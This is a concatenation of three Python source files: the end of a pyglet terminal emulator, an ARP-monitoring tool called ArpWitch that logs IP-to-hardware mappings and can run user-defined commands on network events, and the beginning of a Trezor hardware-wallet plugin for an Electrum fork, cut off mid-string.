val = self.vals.get(obj, self.default)
return self.onget(obj, val)
def __set__(self, obj, value):
self.vals[obj] = value
self.onset(obj)
class Bound(Descriptor):
"""On top of the functionallity provided by Descriptor, Bound ensures that
all values assigned to an attribute stay above or equal to the result of
low, and below or equal to the result of high. Bounds start as 0 through
inf.
"""
@staticmethod
def constrain(val, low=None, high=None):
pick = max(val, low) if low is not None else val
return min(pick, high) if high is not None else pick
def __init__(self, high=lambda obj:None, low=lambda obj:0, **kw):
super().__init__(**kw)
self.high = high
self.low = low
def __set__(self, obj, value):
Descriptor.__set__(self, obj, self.constrain(value, self.low(obj), self.high(obj)))
class Line:
@Descriptor
def text(self):
self.dirty = True
def __init__(self, text=""):
self.dirty = True
self.text = ""
self.graphics = []
class Term:
@Descriptor
def dims(self):
self.update_size()
@property
def width(self):
return self.dims[1]
@width.setter
    def width(self, val):
self.dims = (self.height, val)
@property
def height(self):
return self.dims[0]
@height.setter
    def height(self, val):
self.dims = (val, self.width)
def margin_height(self):
return self.height-1
def margin_onset(self):
self.row = self.row #descriptor magic
margin_top = Bound(margin_height, onset=margin_onset)
margin_bottom = Bound(margin_height, onset=margin_onset)
row = Bound(high=lambda self: self.margin_top,
low=lambda self: self.margin_bottom,
default=0)
col = Bound()
def label(self, text, y, batch=None):
return pyglet.text.Label(
text,
batch=batch,
font_size=self.font_size,
font_name=self.font_name,
x=1, y=y * self.font_height + 1,
anchor_x='left', anchor_y='bottom',
)
def __init__(self, width, height, font_size, shell="/bin/bash", font_name="SourceCodePro for Powerline"):
self.fd = self.fork_pty(shell, shell, "-i")
self.chars = deque()
self.font_name = font_name
self.font_size = font_size
self.font_height = 0#temporary
temp_label = self.label("█", 0)
self.font_height = temp_label.content_height
self.font_width = temp_label.content_width
self.lines = [""]*height
self.dirty = set()
self.batch = None
self.dims = (height, width) #initialises batch
self.margin_top = self.height - 1 #TODO: top margin should follow height
self.margin_bottom = 0
self.row = 0
self.col = 0
self.window = pyglet.window.Window(width=self.width*self.font_width,
height=self.height*self.font_height,
resizable=True)
self.window.event(self.on_draw)
self.window.event(self.on_mouse_scroll)
self.window.event(self.on_key_press)
self.window.event(self.on_text)
self.window.event(self.on_resize)
self.saved_cursor = (self.row, self.col)
self.modes = {
"application": False,
"edit": False,
"cursor": True,
"vertical": False,
"insert": False,
"autowrap": False,
"mouse": False,
}
self.lock = threading.Lock()
self.actor = self.act(self.fill(), self.lock)
def start(self):
pyglet.clock.schedule(self.redraw)
pyglet.app.run()
def on_draw(self):
self.window.clear()
self.draw_cursor()
for d in self.dirty:
if d < self.height:
self.labels[d].text = self.lines[d]
self.batch.draw()
self.window.invalid = False
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
if not self.modes["mouse"]:
if scroll_y < 0:
self.write(''*-scroll_y)
elif scroll_y > 0:
self.write(''*scroll_y)
else:
if scroll_y < 0:
self.write('\x1b[Ma%c%c'%(32+x//self.font_width,32+y//self.font_height)*-scroll_y)
elif scroll_y > 0:
self.write('\x1b[M`%c%c'%(32+x//self.font_width,32+y//self.font_height)*scroll_y)
def on_key_press(self, symbol, modifiers):
if modifiers & key.MOD_CTRL and 96 < symbol <= 122:
self.write(chr(symbol - 96))
elif symbol in symbols:
self.write(symbols[symbol])
elif self.modes["application"] and symbol in application_symbols:
self.write(application_symbols[symbol])
else:
print("unknown", symbol, hex(modifiers))
return
return pyglet.event.EVENT_HANDLED
def on_text(self, text):
self.write(text)
def on_resize(self, width, height):
self.dims = height//self.font_height, width//self.font_width
def redraw(self, dt):
if not self.actor.is_alive():
self.close()
if self.window.invalid:
self.lock.acquire(blocking=True)
self.window.dispatch_event("on_draw")
self.lock.release()
def fork_pty(self, prog, *args):
child_pid, fd = pty.fork()
if child_pid == 0:
sys.stdout.flush()
os.execlp(prog, *args)
else:
return fd
def write(self, item):
os.write(self.fd, item.encode("utf-8"))
def update_size(self):
self.batch = pyglet.graphics.Batch()
diff = self.height - len(self.lines)
if diff > 0:
self.lines += [""]*diff
elif diff < 0:
self.lines = self.lines[:diff]
self.labels = [
self.label(self.lines[i], i, self.batch)
for i in range(self.height)
]
fcntl.ioctl(self.fd, termios.TIOCSWINSZ,
struct.pack("HHHH", self.height, self.width, 0, 0))
def fill(self):
data = b""
while True:
try:
data += os.read(self.fd, 10000)
try:#we might sometimes get data that ends in the middle of a
#unicode glyph. In that case we need to wait. However,
#UnicodeDecodeError can occur in many other cases. C'est la
#vie. ¯\_(ツ)_/¯
yield from data.decode("utf-8")
print()
except UnicodeDecodeError:
pass
else:
data = b""
except OSError:
break
def close(self):
pyglet.app.exit()
def draw_cursor(self):
if not self.modes["cursor"]:
return
x, y = self.col*(self.font_width), (self.row) * (self.font_height),
pyglet.graphics.draw(4, pyglet.gl.GL_QUADS,
('v2f', [
x, y,
x+self.font_width, y,
x+self.font_width, y+self.font_height,
x, y+self.font_height]),
("c3B", [200]*12))
def insert_line(self, index, data):
self.lines.pop()
self.lines.insert(index, data)
self.dirty.update(range(index, self.height))
def insert(self, chars):
print(chars, end="")
l = self.lines[self.row]
if self.modes["insert"]:
self.lines[self.row] = l[:self.col].ljust(self.col, " ") + chars + l[self.col:]
else:
self.lines[self.row] = l[:self.col].ljust(self.col, " ") + chars + l[self.col+len(chars):]
self.col += len(chars)
if len(l) >= self.width:
if self.modes["autowrap"]:
self.insert_line(0, "")
self.col = 0
self.insert(self.lines[self.row][self.width:])
self.splice(self.width, None, self.row + 1)
self.dirty.add(self.row+1)
else:
self.splice(self.width, None, self.row)
self.dirty.add(self.row)
def remove(self, index):
self.lines.pop(index)
self.lines.append("")
self.dirty.update(range(index, self.height))
def splice(self, start, end, row=None):#doesn't update col
row = row if row is not None else self.row
l = self.lines[row]
self.lines[row] = l[:start] + (l[end:] if end is not None else "")
self.dirty.add(row)
def csi(self, chars):
coms = [0]
follow = next(chars)
query = ""
if follow in "<=>?":
query = follow
follow = next(chars)
while follow in "0123456789;":
if follow == ";":
coms.append(0)
else:
coms[-1] *= 10
coms[-1] += int(follow)
follow = next(chars)
if follow not in "m":
print("'CSI", query, coms, follow, "'", sep="", end="")
if follow == "A":
self.row -= coms[0] or 1
elif follow == "B":
self.row += coms[0] or 1
elif follow == "C":
self.col += coms[0] or 1
elif follow == "D":
self.col -= coms[0] or 1
elif follow == "G":
self.col = max(coms[0]-1, 0)
elif follow == "H":
self.row = self.height - (coms[0] or 1)
if len(coms)>1:
self.col = coms[1] - 1
else:
self.col = 0
elif follow == "J":
if coms[0] in (0, 2):
self.splice(self.col, None)
for i in range(self.row -1, -1, -1):
self.splice(0, None, i)
if coms[0] in (1, 2):
self.splice(0, self.col)
for i in range(self.row+1, min(self.height+self.row, len(self.lines))):
self.splice(0, None, i)
elif follow == "K":
if coms[0] == 0:
self.splice(self.col, None)
elif coms[0] == 1:
self.splice(0, self.col)
elif coms[0] == 2:
self.splice(0, None)
elif follow == "L":#IL, insert line
self.remove(self.margin_bottom)
self.insert_line(self.row+1, "")
#self.insert_line(self.row, "")
elif follow == "M":#reMove line
for i in range(coms[0] or 1):
self.remove(self.row)
self.insert_line(self.margin_bottom, "")
elif follow == "P":
self.splice(self.col, self.col + coms[0] if coms[0] > 0 else None)
elif follow == "S":
for _ in range(coms[0] or 1):
self.insert_line(self.margin_bottom, "")
elif follow == "T":
for _ in range(coms[0] or 1):
self.remove(self.margin_bottom)
self.insert_line(self.margin_top, "")
elif follow == "X":
amount = coms[0] or 1
self.splice(self.col, self.col + amount)
self.insert(" " * amount)
elif follow == "Z": #back one tab
self.col //= 8
self.col -= coms[0]
self.col *= 8
elif follow == "d":
self.row = self.height - coms[0]
pass
elif follow == "c" and query == ">":#secondary DA
pass#self.write("\x1b[>0;136;0c") # what putty does
#https://github.com/FauxFaux/PuTTYTray/blob/1c88744f64405fbc024a15712969b083be4bc72c/terminal.c#L3548
elif follow in "lh":
if follow == "l":
state = False
elif follow == "h":
state = True
if coms[0] == 4 and query == "":
self.modes["insert"] = state
if coms[0] == 7 and query == "": #VEN
self.modes["vertical"] = state
elif coms[0] == 7 and query == "?":
self.modes["autowrap"] = state
if coms[0] == 25:#DECTCEM on
self.modes["cursor"] = state
elif coms[0] == 1000:#xterm mouse 1
self.modes["mouse"] = state
elif coms[0] == 1049:#local edit mode
self.modes["edit"] = state
elif follow == "m": #graphics? more like giraffics!
pass
elif follow == "n":
if coms[0] == 6:
self.write("\x1b[{};{}R".format(self.height - self.row, self.col + 1))
elif follow == "r":#set margins
self.margin_bottom, self.margin_top = self.height - coms[1], self.height - coms[0]
@thread
def act(self, chars, lock):
for char in chars:
lock.acquire(blocking=True)
if char == "\n":
if self.row == self.margin_bottom:
self.insert_line(self.row, "")
else:
self.row -= 1
self.col = 0
elif char == "\r":
self.col = 0
elif char == "":
self.col -= 1
elif char == "":
print("")
elif char == "\t":
self.insert(" " * (8 - self.col % 8))
elif char == "\x1b":
follow = next(chars)
if follow == "[": #CSI
self.csi(chars)
elif follow == "(":
("ESC", "(", next(chars))
elif follow == ")":
("ESC", ")", next(chars))
elif follow == "]": #OSC
coms = [""]
for char in chars:
if char == "":
break
elif char == ";":
coms.append("")
else:
coms[-1] += char
if coms[0] == "0":
self.window.set_caption(coms[1])
elif follow == "=":#application mode
self.modes["application"] = True
elif follow == ">":#application mode
self.modes["application"] = False
elif follow == "M": #reverse line feed
self.remove(self.margin_bottom)#just like IL
elif follow == "7":
self.saved_cursor = (self.row, self.col)
elif follow == "8":
self.row, self.col = self.saved_cursor
else:
print("^[", follow)
self.insert("\x1b" + follow)
continue
else:
self.insert(char)
self.window.invalid = True
self.lock.release()
term = Term(WIDTH, HEIGHT, SIZE)
def format(line):
fin = ""
for ch in line:
if ord(ch) < 32:
fin += "^" + chr(ord(ch) + 64)
else:
fin += ch
return fin
#cProfile.run("term.start()")
term.start()
|
ArpWitch.py
|
import os
import json
import time
import logging
import argparse
import datetime
import subprocess
from arpwitch import LoggerManager
from threading import Thread
try: from ouilookup import OuiLookup
except ModuleNotFoundError: pass
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import sniff, ARP
class ArpWitchException(Exception):
pass
class ArpWitch:
VERSION = '2018.1'
SNIFF_BATCH_SIZE = 16
SNIFF_BATCH_TIMEOUT = 2
SAVE_DATA_INTERVAL_DEFAULT = 30
Log = None
OuiLookup = None
meta = {}
ip_data = {}
hw_data = {}
exec_subprocesses = []
save_data_filename = None
save_data_interval_seconds = None
select_all_mapping_events = None
select_new_mapping_events = None
output_to_terminal_ip_events = None
output_to_terminal_hw_events = None
command_exec_ip_events = None
command_exec_hw_events = None
command_exec_run_as_user = None
query_address = None
do_version = None
do_witch = None
debug = None
def __init__(self):
self.arg_parse()
self.Log = LoggerManager.LoggerManager().build_logger(
'arpwitch',
level=logging.INFO,
is_console_quiet=True,
is_console_debug=self.debug
)
try:
self.OuiLookup = OuiLookup()
except NameError:
self.OuiLookup = None
def arg_parse(self):
ArgParse = argparse.ArgumentParser(
prog='arpwitch',
add_help=False,
            description='A modern arpwatch tool with JSON formatted outputs and easy options to exec commands when '
'network changes are observed.',
)
ArgParseGroup0 = ArgParse.add_argument_group(title='datafile arguments')
ArgParseGroup0.add_argument(
'-f',
required=False,
type=str,
metavar='<datafile>',
            help='The arpwitch datafile - all arp event data is stored in this file in a simple JSON format making it '
'easy to query and inspect with external tools such as jq - this argument is required.'
)
ArgParseGroup0.add_argument(
'-s',
required=False,
default=self.SAVE_DATA_INTERVAL_DEFAULT,
type=int,
metavar='<seconds>',
help='Seconds interval between datafile write to file - default is {} seconds.'.
format(self.SAVE_DATA_INTERVAL_DEFAULT)
)
ArgParseGroup1 = ArgParse.add_argument_group(
title='ARP mapping event selection arguments',
)
ArgParseGroup1.add_argument(
'-a',
required=False,
default=False,
action='store_true',
help='Select all ARP mapping events packets regardless if they have been previously observed.'
)
ArgParseGroup1.add_argument(
'-n',
required=False,
default=False,
action='store_true',
help='Select only new ARP mapping events that have not been previously observed.'
)
ArgParseGroup2 = ArgParse.add_argument_group(
title='ARP mapping event terminal output arguments',
description='event data is output to <stdout> as one event per line in a JSON format which facilitates '
'easy chaining to other tools, such as jq and others.'
)
ArgParseGroup2.add_argument(
'-i',
required=False,
default=False,
action='store_true',
help='Output to terminal the event data for ip-address (IP) arp packet events.'
)
ArgParseGroup2.add_argument(
'-h',
required=False,
default=False,
action='store_true',
help='Output to terminal the event data for network-hardware (HW) arp packet events.'
)
ArgParseGroup3 = ArgParse.add_argument_group(
title='ARP mapping event command exec arguments',
description='the following exec command data substitutions are available: '
'{IP}=ip-address, '
'{HW}=network-address, '
'{hw}=network-address-short, '
'{TS}=timestamp-utc'
)
ArgParseGroup3.add_argument(
'-I',
required=False,
type=str,
metavar='<command>',
help='Command to exec on ip-address (IP) arp packet events.'
)
ArgParseGroup3.add_argument(
'-H',
required=False,
type=str,
metavar='<command>',
help='Command to exec on network-hardware (HW) arp packet events.'
)
ArgParseGroup3.add_argument(
'-U',
required=False,
type=str,
metavar='<user>',
            help='User to exec commands under; if not set, commands run as the same user that arpwitch is running as.'
)
ArgParseGroup4 = ArgParse.add_argument_group(title='optional arguments')
ArgParseGroup4.add_argument(
'-q',
required=False,
type=str,
metavar='<address>',
help='Query the <datafile> for an IP or HW address and return results in JSON formatted output and exit.'
)
ArgParseGroup4.add_argument(
'-v',
required=False,
default=False,
action='store_true',
help='Return the arpwitch version and exit.'
)
ArgParseGroup4.add_argument(
'-w',
required=False,
default=False,
action='store_true',
help='Supply one witch to the terminal and exit.'
)
ArgParseGroup4.add_argument(
'-d',
required=False,
default=False,
action='store_true',
help='Enable debug log output to <stderr> in the terminal.'
)
args = ArgParse.parse_args()
# datafile arguments:
if args.f:
self.save_data_filename = args.f
else:
if args.w is False and args.v is False:
ArgParse.print_help()
print('\n'
'Example #1 : output new ip-address ARP data events\n'
' $ arpwitch -n -f /var/lib/arpwitch/arpwitch.dat -i'
'\n\n'
'Example #2 : invoke nmap on new network-hardware ARP data events\n'
' $ arpwitch -n -f /var/lib/arpwitch/arpwitch.dat -U root -H \'nmap -O \\ \n'
' -T4 -Pn -oN /var/lib/arpwitch/scans/{TS}_{hw}_{IP}.nmap {IP}\''
'\n\n'
'Example #3 : query datafile for ARP event data about an ip-address\n'
' $ arpwitch -f /var/lib/arpwitch/arpwitch.dat -q 192.168.0.1'
'\n'
)
exit(1)
self.save_data_interval_seconds = args.s
# ARP mapping event selection arguments:
self.select_all_mapping_events = args.a
self.select_new_mapping_events = args.n
# ARP mapping event terminal output arguments:
self.output_to_terminal_ip_events = args.i
self.output_to_terminal_hw_events = args.h
# ARP mapping event command exec arguments:
self.command_exec_ip_events = args.I
self.command_exec_hw_events = args.H
self.command_exec_run_as_user = args.U
# optional arguments:
self.query_address = args.q
self.do_version = args.v
self.do_witch = args.w
self.debug = args.d
def main(self):
if self.do_version is True:
print('arpwitch {}'.format(self.VERSION))
exit(0)
if self.do_witch is True:
print(self.witch())
exit(0)
self.data_file_load()
if self.query_address is not None:
print(json.dumps(self.do_query(self.query_address)), flush=True)
exit(0)
if self.OuiLookup is None:
self.Log.warning('OuiLookup package not available to resolve hardware addresses - consider installing via pip')
else:
self.Log.info('Using the OuiLookup package to resolve hardware addresses')
batch_has_new = False
batch_interval_start = time.time()
while True:
subprocess_list_is_updated = False
batch_timestamp = self.timestamp()
batch_packets = []
try:
batch_packets = self.sniff_batch_arp_packets(self.SNIFF_BATCH_SIZE, self.SNIFF_BATCH_TIMEOUT)
except PermissionError:
                self.Log.error('arpwitch requires root privileges to sniff network interfaces!')
exit(1)
for packet in batch_packets:
packet_data = self.store_arp_packet_event(packet, timestamp=batch_timestamp)
if len(packet_data) > 0:
if self.select_all_mapping_events is True:
if self.output_to_terminal_hw_events is True:
print(json.dumps({'hw': packet_data['hw']}), flush=True)
if self.output_to_terminal_ip_events is True:
print(json.dumps({'ip': packet_data['ip']}), flush=True)
if self.command_exec_hw_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('hw', packet_data),
as_user=self.command_exec_run_as_user
)
if self.command_exec_ip_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('ip', packet_data),
as_user=self.command_exec_run_as_user
)
if self.select_new_mapping_events is True and packet_data['hw']['is_new'] is True:
if self.output_to_terminal_hw_events is True:
print(json.dumps({'hw': packet_data['hw']}), flush=True)
if self.command_exec_hw_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('hw', packet_data),
as_user=self.command_exec_run_as_user
)
if self.select_new_mapping_events is True and packet_data['ip']['is_new'] is True:
if self.output_to_terminal_ip_events is True:
print(json.dumps({'ip': packet_data['ip']}), flush=True)
if self.command_exec_ip_events is not None:
subprocess_list_is_updated = True
self.async_command_exec(
command_line=self.exec_command_line_create('ip', packet_data),
as_user=self.command_exec_run_as_user
)
# flag batches with new data so data_file_write() can be invoked below
if packet_data['hw']['is_new'] is True or packet_data['ip']['is_new'] is True:
batch_has_new = True
for i, sp in enumerate(self.exec_subprocesses):
if sp.poll() is not None:
self.exec_subprocesses.pop(i)
subprocess_list_is_updated = True
if subprocess_list_is_updated is True:
# NB: race condition here where new processes may have already completed thus resulting in zero value
self.Log.debug('ArpWitch.main() - currently {} active subprocesses'.format(len(self.exec_subprocesses)))
# if self.debug is True:
# print('.', end='', flush=True, file=sys.stderr)
if time.time() > batch_interval_start + self.save_data_interval_seconds:
if batch_has_new is True:
self.data_file_write()
batch_has_new = False
batch_interval_start = time.time()
def store_arp_packet_event(self, packet, timestamp):
packet_data = {}
if packet['ip_src'] != '0.0.0.0':
hw_address = packet['hw_src']
ip_address = packet['ip_src']
hw_address_is_new = False
ip_address_is_new = False
hw_vendor = None
if self.OuiLookup is not None:
hw_vendor = list(self.OuiLookup.query(hw_address)[0].values())[0]
# ip_data
if ip_address not in self.ip_data:
ip_address_is_new = True
self.ip_data[ip_address] = {}
if hw_address not in self.ip_data[ip_address]:
self.ip_data[ip_address][hw_address] = {
'count': 0,
'ts_first': timestamp,
'ts_last': None
}
self.ip_data[ip_address][hw_address]['count'] += 1
self.ip_data[ip_address][hw_address]['ts_last'] = timestamp
if self.OuiLookup is not None:
self.ip_data[ip_address][hw_address]['hw_vendor'] = hw_vendor
# hw_data
if hw_address not in self.hw_data:
hw_address_is_new = True
self.hw_data[hw_address] = {}
if ip_address not in self.hw_data[hw_address]:
self.hw_data[hw_address][ip_address] = {
'count': 0,
'ts_first': timestamp,
'ts_last': None
}
self.hw_data[hw_address][ip_address]['count'] += 1
self.hw_data[hw_address][ip_address]['ts_last'] = timestamp
if self.OuiLookup is not None:
self.hw_data[hw_address]['hw_vendor'] = hw_vendor
packet_data = {
'ip': {ip_address: self.ip_data[ip_address], 'is_new': ip_address_is_new},
'hw': {hw_address: self.hw_data[hw_address], 'is_new': hw_address_is_new},
}
return packet_data
def exec_command_line_create(self, address_type, packet_data):
self.Log.debug('ArpWitch.exec_command_on_new_address({}, {})'.format(address_type, '<packet_data>'))
ip_address = None
hw_address = None
command_line = None
for ip in packet_data['ip'].keys():
if ip != 'is_new':
ip_address = ip
for hw in packet_data['hw'].keys():
if hw != 'is_new':
hw_address = hw
if address_type == 'ip':
command_line = self.command_exec_ip_events.format(
IP=ip_address,
HW=hw_address, hw=hw_address.replace(':',''),
TS=self.timestamp())
elif address_type == 'hw':
command_line = self.command_exec_hw_events.format(
IP=ip_address,
HW=hw_address, hw=hw_address.replace(':',''),
TS=self.timestamp())
else:
raise ArpWitchException('Unsupported address_type', address_type)
return command_line
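        # Illustrative example (hypothetical command template, not from the original
        # source): with `-I 'nmap -sn {IP}'` and a packet seen from 192.168.0.10,
        # this returns the string 'nmap -sn 192.168.0.10'.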
def async_command_exec(self, command_line, as_user=None):
self.Log.debug('ArpWitch.async_command_exec({}, {})'.format(command_line, as_user))
thread = Thread(target=self.command_exec, args=(command_line, as_user))
thread.start()
def command_exec(self, command_line, as_user=None):
self.Log.debug('ArpWitch.command_exec({}, {})'.format(command_line, as_user))
if as_user is not None:
command_line = 'sudo -u {} {}'.format(as_user, command_line)
self.exec_subprocesses.append(subprocess.Popen(command_line,
shell=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.STDOUT
))
def sniff_batch_arp_packets(self, batch_size, batch_timeout):
packets = []
sniffed_packets = sniff(filter='arp', count=batch_size, timeout=batch_timeout, store=1)
for sniffed_packet in sniffed_packets:
packet = {
'op': None,
'hw_src': None,
'ip_src': None,
'ip_dst': None
}
if sniffed_packet[ARP].op == 1:
packet['op'] = 'ARP_REQ'
elif sniffed_packet[ARP].op == 2:
packet['op'] = 'ARP_REP'
packet['hw_src'] = self.scrub_address('hw',sniffed_packet.sprintf('%ARP.hwsrc%'))
packet['ip_src'] = self.scrub_address('ip',sniffed_packet.sprintf('%ARP.psrc%'))
packet['ip_dst'] = self.scrub_address('ip',sniffed_packet.sprintf('%ARP.pdst%'))
packets.append(packet)
return packets
def data_file_load(self):
self.Log.debug('ArpWitch.data_file_load()')
self.meta = {
'arpwitch': self.VERSION,
'starts': 0,
'ts_first': self.timestamp(),
'ts_last': None,
'hw_count': None,
'ip_count': None,
}
if os.path.isfile(self.save_data_filename):
with open(self.save_data_filename, 'r') as f:
data = json.load(f)
self.meta = data['meta']
self.meta['starts'] += 1
self.ip_data = data['ip']
self.hw_data = data['hw']
self.Log.debug('ArpWitch.data_file_load() - loaded from {}'.format(self.save_data_filename))
else:
            self.Log.warning('ArpWitch.data_file_load() - no existing data file found {}'.format(self.save_data_filename))
for meta_field in self.meta:
self.Log.info('{}: {}'.format(meta_field, self.meta[meta_field]))
def data_file_write(self):
self.Log.debug('ArpWitch.data_file_write()')
self.meta['ts_last'] = self.timestamp()
self.meta['hw_count'] = len(self.hw_data)
self.meta['ip_count'] = len(self.ip_data)
with open(self.save_data_filename, 'w') as f:
json.dump({
'meta': self.meta,
'ip': self.ip_data,
'hw': self.hw_data,
}, f)
self.Log.debug('ArpWitch.data_file_write() - written to {}'.format(self.save_data_filename))
def do_query(self, address):
address = address.replace('-',':').lower()
if len(address.split(':')) == 6:
if address in self.hw_data:
return {'hw':{address: self.hw_data[address]}}
else:
if address in self.ip_data:
return {'ip':{address: self.ip_data[address]}}
return {}
def timestamp(self):
return datetime.datetime.utcnow().strftime("%Y%m%dZ%H%M%S")
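        # e.g. "20180704Z142530" (UTC date, a literal 'Z', then HHMMSS)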
def scrub_address(self, address_type, address):
if address_type == 'ip':
return ''.join(x for x in address if x in ['.','0','1','2','3','4','5','6','7','8','9'])
elif address_type == 'hw':
return ''.join(x for x in address if x in [':','0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'])
else:
raise ArpWitchException('unsupported address_type', address_type)
def witch(self):
return \
' \n' \
' \n' \
' % \n' \
' @@ ,@@@@(@, \n' \
' @@@@. @@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@ \n' \
' .@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@* \n' \
' * @@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@* \n' \
' @@@@@@@@@@@ %@@@% \n' \
' @@@@ @@@@@@@@@ \n' \
' @@@@ @@@@@@@@@. \n' \
' @@@@/ .@@@@@@@* \n' \
' @@@ @@@@@@@# \n' \
' @@& &@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \n' \
' @@@@@@@@@@@@@@@@@@@@@@@ *@@@@@@@ \n' \
' @@@@@@@@ @@@@@@@@@@ . #@@@@@@@@@@@ \n' \
' @@@@@@@ @ /@@@@@@@@@@@@@@@@@@@@@@@& \n' \
' .@@@(@@@ /@@@@@@@@@@@@@@@@@@@@ \n' \
' &@@@ @@@ @@@@@@@@@@@@@@@@@@ \n' \
' @@@@ &@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@, \n' \
' @@@. @@@@@ @@@@@@@@@@@@@@@@@@@@@@ \n' \
' &@@ &@@@@ #@@# (@@@@@@@@@& \n' \
' @@@@@ @@@ \n' \
' @@@@@ \n' \
' @@@@ \n' \
' @@@ \n' \
' %@ \n' \
' \n' \
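# Hedged usage sketch (not part of the original file): arpwitch is normally
# started from the command line; an equivalent script entry point would be:
#
#   if __name__ == '__main__':
#       ArpWitch().main()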
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ganja.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ganja.ganja import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ganja import constants
from electrum_ganja.i18n import _
from electrum_ganja.plugins import BasePlugin, Device
from electrum_ganja.transaction import deserialize, Transaction
from electrum_ganja.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ganja.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.ckd_public
import trezorlib.messages
self.client_class = client.TrezorClient
self.ckd_public = trezorlib.ckd_public
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Ganjacoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
